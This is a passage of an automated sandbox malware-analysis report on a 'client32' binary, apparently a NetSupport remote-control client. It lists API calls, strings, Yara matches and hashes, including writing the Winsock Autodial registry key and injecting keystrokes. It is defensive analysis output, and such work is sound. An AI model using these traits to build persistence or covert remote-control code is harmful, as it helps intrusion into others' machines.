                                                                              • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 4241058051-934300333
                                                                              • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                              • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                              • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                              • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,00000000,?,75BF8400), ref: 111442F0
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144303
                                                                              • GetFileVersionInfoSizeA.VERSION(?,?), ref: 11144323
                                                                              • _malloc.LIBCMT ref: 1114432F
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 1114434D
                                                                              • _free.LIBCMT ref: 1114435D
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • VerQueryValueA.VERSION(?,1119A5BC,?,?,?,?,00000000,00000000,?), ref: 1114438E
                                                                              • _free.LIBCMT ref: 111443B1
                                                                              Similarity
                                                                              • API ID: File$HeapInfoModuleVersion_free$AllocateErrorFreeHandleLastNameQuerySizeValue_malloc
                                                                              • String ID:
                                                                              • API String ID: 1929493397-0
                                                                              • Opcode ID: edd211c50a3777fb5ac3ae8ca10e20c72d94fd26d850039a83edcecaba31b236
                                                                              • Instruction ID: 533d070b008c48d0019e4fafecd2d90481fbd6e663e37e79b598d21e300b118d
                                                                              • Opcode Fuzzy Hash: edd211c50a3777fb5ac3ae8ca10e20c72d94fd26d850039a83edcecaba31b236
                                                                              • Instruction Fuzzy Hash: 242161769001299BDB14DF64DC44EDEF3BCEF58714F004199E94997200DAB1AE94CF90
                                                                              APIs
                                                                                • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,AB86ACF8,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 1101B776
                                                                              • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                              • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                              Strings
                                                                              • NSSecurity.dll, xrefs: 1101B7A3
                                                                              • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                              • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                              Similarity
                                                                              • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                              • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                              • API String ID: 3515807602-1044166025
                                                                              • Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                              • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                              • Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                              • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 110505B5
                                                                              • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 110505C6
                                                                              Similarity
                                                                              • API ID: MessagePostWindow
                                                                              • String ID: 10.21.0.0$Client$Disconnect(%p), closing player$ReconnectDelay
                                                                              • API String ID: 3618638489-3222940297
                                                                              • Opcode ID: 56d0403b3980d3986053706dd81e3e4ace557baac3e2369d8f785017eea65476
                                                                              • Instruction ID: af3b4c147a4513b3c39047db549f56ac60d38a2ab96126e405b75e909720095d
                                                                              • Opcode Fuzzy Hash: 56d0403b3980d3986053706dd81e3e4ace557baac3e2369d8f785017eea65476
                                                                              • Instruction Fuzzy Hash: 8D61A479A022525BEB95DFA0CCC4FBAB7A8AF4570CF1441F8E9094F299CB75B440CB61
                                                                              APIs
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11004130
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 110041A7
                                                                              • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110041D2
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 110041FE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Similarity
                                                                              • API ID: EnableWindow$ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2354609054-2830328467
                                                                              • Opcode ID: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
                                                                              • Instruction ID: c13629e3a69401f36b1837560bfd6e90eee75297420fac0ab380ec534ade091b
                                                                              • Opcode Fuzzy Hash: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
                                                                              • Instruction Fuzzy Hash: AC318BB5A40309ABE720DF55CC86F9AF3E4FB4C708F108569E91AA7680D7B4B8008B94
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?), ref: 1106436E
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Services\Winsock\Autodial,00000000,00000000,00000000), ref: 11064396
                                                                              • RegSetValueExA.ADVAPI32(00000000,AutodialDllName32,00000000,?,111EE741,00000010), ref: 11064480
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 1106448D
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Similarity
                                                                              • API ID: Value$CloseOpenQueryVersion
                                                                              • String ID: AutodialDllName32$System\CurrentControlSet\Services\Winsock\Autodial
                                                                              • API String ID: 387276457-2283657482
                                                                              • Opcode ID: aa4cde0aa82c8723e533341a8807f67dc9b88c45f56a7f544780993e07b50a5c
                                                                              • Instruction ID: 375109a592318106ba114329bda040cb1860311447808832b59f0ce0bf7a2c6e
                                                                              • Opcode Fuzzy Hash: aa4cde0aa82c8723e533341a8807f67dc9b88c45f56a7f544780993e07b50a5c
                                                                              • Instruction Fuzzy Hash: EA31A374E516689FEB61CF90CC89FAAF7BDFB05308F0040D8E55896145EB705945CF51
                                                                              APIs
                                                                                • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,74DF23A0,1100BF7B), ref: 11110928
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                              • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                              • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                              • IsWindow.USER32(?), ref: 1103D17E
                                                                              • SendMessageA.USER32(?,0000004A,00040270,00000492), ref: 1103D1B8
                                                                              • _free.LIBCMT ref: 1103D1BF
                                                                              Similarity
                                                                              • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                              • String ID: Show16
                                                                              • API String ID: 625148989-2844191965
                                                                              • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                              • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                              • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                              • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                              APIs
                                                                              • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                              • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                              • API String ID: 2735369351-763374134
                                                                              • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                              • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                              • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                              • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMAnnotate), ref: 11002094
                                                                              • GetSystemMetrics.USER32(0000004E), ref: 110020EA
                                                                              • GetSystemMetrics.USER32(0000004F), ref: 110020F4
                                                                              • GetSystemMetrics.USER32(00000000), ref: 11002109
                                                                              • GetSystemMetrics.USER32(00000001), ref: 11002113
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem$AtomGlobal
                                                                              • String ID: NSMAnnotate
                                                                              • API String ID: 1775358667-1587977882
                                                                              • Opcode ID: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
                                                                              • Instruction ID: c7367c546af50a4de639236848e5e5652b6277b92aa1928d07c4543d278ba0f2
                                                                              • Opcode Fuzzy Hash: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
                                                                              • Instruction Fuzzy Hash: 2021AFB0901B549FD321DF6A8984696FBE8FFA4754F00491FD2AA87A20D7B5A440CF44
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                              • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                              • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                              • _free.LIBCMT ref: 1100B3C8
                                                                              • _free.LIBCMT ref: 1100B3CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                              • String ID:
                                                                              • API String ID: 705253285-0
                                                                              • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                              • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                              • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                              • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                              APIs
                                                                              • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                              • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                              • API String ID: 2776021309-3012761530
                                                                              • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                              • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                              • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                              • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,111DD208,00000008,1116C650,00000000,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 1116C559
                                                                              • __lock.LIBCMT ref: 1116C58D
                                                                                • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                              • InterlockedIncrement.KERNEL32(111ECF10), ref: 1116C59A
                                                                              • __lock.LIBCMT ref: 1116C5AE
                                                                              • ___addlocaleref.LIBCMT ref: 1116C5CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                              • String ID: KERNEL32.DLL
                                                                              • API String ID: 637971194-2576044830
                                                                              • Opcode ID: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
                                                                              • Instruction ID: a1ea6c524cc80d8162a63b7122f67c86dce844b07e1b6a5dabb7ffb63b15338b
                                                                              • Opcode Fuzzy Hash: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
                                                                              • Instruction Fuzzy Hash: F001A175541B029FE7218FA9C844749FBE0AF51319F10890ED4A657B90CBB1A640CF11
                                                                              APIs
                                                                              • GlobalLock.KERNEL32(?), ref: 1103257A
                                                                              • GlobalSize.KERNEL32(?), ref: 11032583
                                                                              • _malloc.LIBCMT ref: 1103258F
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memmove.LIBCMT ref: 110325BE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Global$AllocateErrorExitHeapLastLockMessageProcessSize_malloc_memmovewsprintf
                                                                              • String ID: *pData$..\ctl32\clipbrd.cpp
                                                                              • API String ID: 4160999899-373438037
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                              • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 468487828-934300333
                                                                              Strings
                                                                              • Error %dz discarded %-4u bytes: %s, xrefs: 1107231C
                                                                              • %02x , xrefs: 110722FD
                                                                              • Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s, xrefs: 110725C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %02x $Error %dz discarded %-4u bytes: %s$Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s
                                                                              • API String ID: 0-2590468221
                                                                              APIs
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11032104
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 11032120
                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 11032143
                                                                              • _memmove.LIBCMT ref: 11032197
                                                                              • CloseHandle.KERNEL32(?), ref: 110321D3
                                                                              • CloseHandle.KERNEL32(?), ref: 11032234
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseHandle$CreateReadSize_malloc_memmove_memset
                                                                              • String ID:
                                                                              • API String ID: 2574518533-0
                                                                              APIs
                                                                              • GetClipboardFormatNameA.USER32(?,?,00000080), ref: 1103239B
                                                                              • _memmove.LIBCMT ref: 11032429
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11032499
                                                                              • TranslateMessage.USER32(?), ref: 110324A7
                                                                              • DispatchMessageA.USER32(?), ref: 110324B4
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110324CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Peek$ClipboardDispatchFormatNameTranslate_memmove
                                                                              • String ID:
                                                                              • API String ID: 1130817274-0
                                                                              APIs
                                                                              • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                              • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                              • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                              • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                              • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                              • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                              • String ID:
                                                                              • API String ID: 2375713580-0
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 11028450: _memset.LIBCMT ref: 11028485
                                                                                • Part of subcall function 11028450: wsprintfA.USER32 ref: 110284BA
                                                                                • Part of subcall function 11028450: WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
                                                                                • Part of subcall function 11028450: GetExitCodeProcess.KERNEL32(?,?), ref: 11028513
                                                                                • Part of subcall function 11028450: CloseHandle.KERNEL32(?,00000000), ref: 11028545
                                                                                • Part of subcall function 11028450: CloseHandle.KERNEL32(?), ref: 1102854E
                                                                              • keybd_event.USER32(0000005B,00000000,00000000,00000000), ref: 110285A6
                                                                              • keybd_event.USER32(0000005B,00000000,00000002,00000000), ref: 110285B0
                                                                              • keybd_event.USER32(00000012,00000000,00000000,00000000), ref: 110285B7
                                                                              • keybd_event.USER32(00000009,00000000,00000000,00000000), ref: 110285C1
                                                                              • keybd_event.USER32(00000009,00000000,00000002,00000000), ref: 110285CB
                                                                              • keybd_event.USER32(00000012,00000000,00000002,00000000), ref: 110285D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: keybd_event$CloseHandle_memset$CodeExitObjectOpenProcessSingleVersionWait_strncpywsprintf
                                                                              • String ID:
                                                                              • API String ID: 1958445444-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ObjectSelect$LineMove
                                                                              • String ID:
                                                                              • API String ID: 359220273-0
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                              • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                              • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$EventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 2857295742-0
                                                                              APIs
                                                                                • Part of subcall function 110886C0: _memset.LIBCMT ref: 110886DF
                                                                                • Part of subcall function 110886C0: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                              • _memset.LIBCMT ref: 110880C2
                                                                              • _free.LIBCMT ref: 11088176
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset$CriticalInitializeSection_free
                                                                              • String ID: ..\CTL32\EncryptFuncs.cpp$1 + (int) strlen(pszEnc64) < maxlen$pDES
                                                                              • API String ID: 1034327355-3728095610
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 11034143
                                                                              • SendMessageA.USER32(?,00000149,00000000,00000000), ref: 11034169
                                                                              • SendMessageA.USER32(?,00000148,00000000,?), ref: 1103418D
                                                                              • _strncmp.LIBCMT ref: 110341F2
                                                                              Strings
